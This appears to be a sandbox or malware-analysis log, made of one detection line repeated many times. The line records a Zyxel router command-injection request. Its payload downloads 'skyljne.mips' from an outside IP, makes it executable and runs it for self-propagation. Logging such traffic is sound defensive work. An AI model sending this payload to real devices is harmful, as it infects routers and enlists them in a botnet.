            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;
